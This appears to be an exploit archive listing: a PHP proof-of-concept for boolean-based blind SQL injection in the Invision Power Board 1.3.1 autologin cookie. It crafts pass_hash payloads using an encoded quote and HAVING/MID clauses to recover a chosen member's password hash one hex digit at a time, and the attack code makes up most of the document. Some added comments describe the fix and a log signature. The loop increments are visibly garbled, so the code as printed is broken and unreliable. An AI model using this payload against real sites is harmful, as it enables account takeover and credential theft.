
Invision Power Board <= 1.3.1 Login.PHP SQL Injection (working)


http://www.gipsky.com/
<?php

/*

<= 1.3.1 Final

/str0ke

*/



/* Proof-of-concept for a boolean-based blind SQL injection in the IPB
   autologin path (index.php?act=Login&CODE=autologin): the pass_hash
   cookie value is concatenated into the members query without
   escaping (see the reconstructed query further down). Each request
   tests one hex digit of the victim row's password hash; the outcome
   is read from the Location header of the redirect. From a defender's
   view, the fix is a parameterised query plus validating the cookie as
   exactly 32 hex characters before it reaches SQL, and the request
   shape below (a `%27`/`HAVING` payload inside the Cookie header of an
   autologin request) is the signature to alert on in web logs. */
$server = "SERVER";   // target host, left as a placeholder in this listing

$port = 80;

$file = "PATH";       // web root path prefix, also a placeholder



$target = 81;         // member id whose hash is enumerated



/* User id and password used to fake-logon are not important. '10' is a

random number. */

$id = 10;

$pass = "";



$hex = "0123456789abcdef";   // alphabet of the 32-char MD5 hash

/* NOTE(review): as listed, both loop updates (`$i ` here and `$idx ;`
   below) are incomplete — the operator was evidently lost when the page
   was extracted. Left untouched; the script does not run as printed. */
for($i = 1; $i <= 32; $i ) {

$idx = 0;

$found = false;



while( !($found) ) {

$letter = substr($hex, $idx, 1);



/* %27 translates to ', which gets past magic quotes.

This is translated to ' by urldecode. */
/* Why the bypass works: magic_quotes_gpc escapes the raw cookie value,
   but the application urldecodes it afterwards, so the quote is
   reintroduced after escaping. Validating the decoded value (or not
   decoding at all) closes that gap. */

$cookie =

"member_id=$id;pass_hash=$pass%27 OR id=$target";

$cookie .=

" HAVING id=$target AND MID(`password`,$i,1)=%27" . $letter;



/* Query is in effect: SELECT * FROM ibf_members

WHERE id=$id AND password='$pass' OR

id=$target

HAVING id=$target AND

MID(`password`,$i,1)='$letter' */



/* Oracle: a HEAD request with the crafted cookie; only the response
   headers are needed. */
$header = getHeader($server, $port, $file .

"index.php?act=Login&CODE=autologin", $cookie);

/* A redirect back to the login form (CODE=00) means the row did not
   match, i.e. the guessed digit is wrong. Anything else counts as a
   hit — including a failed connection ("Unknown"), so network errors
   produce bogus digits rather than an abort. */
if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',

$header) ) {

echo $i . ": " . $letter . "\n";

$found = true;



$hash .= $letter;   // $hash is never initialised; first append starts from ""

} else {

$idx ;

}

}

}



echo "\n\nFinal Hash: $hash\n";



/**
 * Send a single HTTP/1.1 HEAD request with the given Cookie header and
 * return the raw response headers.
 *
 * Returns the literal string "Unknown" when the TCP connection cannot be
 * opened; callers that pattern-match on the headers therefore see a
 * connection failure as "no Location header", not as an error.
 *
 * Known limitations, kept as in the original: the read loop only stops
 * when the buffer ends in a blank line, so a peer that closes the socket
 * early leaves it spinning on empty reads, and the socket is never closed
 * explicitly (it is released when $sock goes out of scope).
 *
 * @param string $server hostname, resolved with gethostbyname()
 * @param int    $port
 * @param string $file   request target (path + query string)
 * @param string $cookie raw Cookie header value, sent unmodified
 * @return string raw response headers, or "Unknown" on connect failure
 */
function getHeader($server, $port, $file, $cookie) {
    $addr = gethostbyname($server);
    $sock = fsockopen($addr, $port);

    // Guard clause instead of if/else: connection failure short-circuits.
    if (!$sock) {
        return "Unknown";
    }

    // HEAD keeps the exchange to headers only; Connection: close tells the
    // server not to keep the socket alive after this one response.
    $requestLines = [
        "HEAD $file HTTP/1.1",
        "Host: $server:$port",
        "Cookie: $cookie",
        "Connection: close",
        "",
        "",
    ];
    fputs($sock, implode("\r\n", $requestLines));

    // Accumulate 512-byte chunks until the header block terminator arrives.
    $response = '';
    do {
        $response .= fread($sock, 512);
    } while (!preg_match('/\r\n\r\n$/', $response));

    return $response;
}

?>

[2005-06-08]